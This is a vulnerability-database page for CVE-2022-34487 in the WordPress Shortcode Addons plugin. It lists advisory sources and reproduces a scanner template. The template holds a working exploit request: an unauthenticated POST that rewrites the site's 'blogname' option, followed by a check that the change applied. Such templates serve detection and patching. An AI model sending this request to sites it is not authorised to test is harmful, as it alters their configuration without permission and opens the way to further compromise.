| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2022-34487 | 21 Jul 202222:23 | – | circl | |
| WordPress plugin Shortcode Addons 安全漏洞 | 21 Jul 202200:00 | – | cnnvd | |
| CVE-2022-34487 | 21 Jul 202217:27 | – | cve | |
| CVE-2022-34487 WordPress Shortcode Addons plugin <= 3.0.2 - Unauthenticated Arbitrary Option Update vulnerability | 21 Jul 202217:27 | – | cvelist | |
| EUVD-2022-37442 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-34487 | 21 Jul 202218:15 | – | nvd | |
| CVE-2022-34487 | 21 Jul 202218:15 | – | osv | |
| WordPress Shortcode Addons plugin <= 3.0.2 - Unauthenticated Arbitrary Option Update vulnerability | 30 Jun 202200:00 | – | patchstack | |
| Design/Logic Flaw | 21 Jul 202218:15 | – | prion | |
| PT-2022-22178 · WordPress · Shortcode Addons | 21 Jul 202200:00 | – | ptsecurity |
id: CVE-2022-34487
info:
name: ShortCode Addons - Unauthenticated Options Update
author: Sourabh-Sahu
severity: critical
description: |
WordPress plugin Shortcode Addons <= 3.0.2 contains an unauthenticated arbitrary option update caused by insufficient access controls in the plugin, letting attackers modify options without authentication.
impact: |
Attackers can modify plugin options arbitrarily, potentially leading to site defacement, data tampering, or further exploitation.
remediation: |
Update to the latest version of Shortcode Addons plugin.
reference:
- https://wpscan.com/vulnerability/c8dd91d5-fdc4-4852-9823-6d0047b214fe/
- https://patchstack.com/database/vulnerability/shortcode-addons/wordpress-shortcode-addons-plugin-3-0-3-unauthenticated-arbitrary-option-update-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-34487
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-34487
cwe-id: CWE-264
epss-score: 0.02654
epss-percentile: 0.83823
cpe: cpe:2.3:a:oxilab:shortcode_addons:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
tags: cve,cve2022,wp,wp-plugin,wordpress,shortcode-addons,vkev
flow: http(1) && http(2)
variables:
rand: "{{randstr}}"
http:
- raw:
- |
POST /wp-json/ShortCodeAddonsUltimate/v2/addons_settings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22{{rand}}%22%7D
matchers:
- type: dsl
internal: true
dsl:
- status_code == 200
- contains(body, 'oxi-confirmation-success')
condition: and
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body, rand, "/wp-")
- status_code == 200
condition: and
# digest: 4b0a00483046022100ec1f084dcee43b2c7236da6796603cf1305f915874fee25ceae70b15c0cff644022100e019bd2eebf9ef3a89787aa48ed6990997cc9cf176072d6798bfda4f6fd574db:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation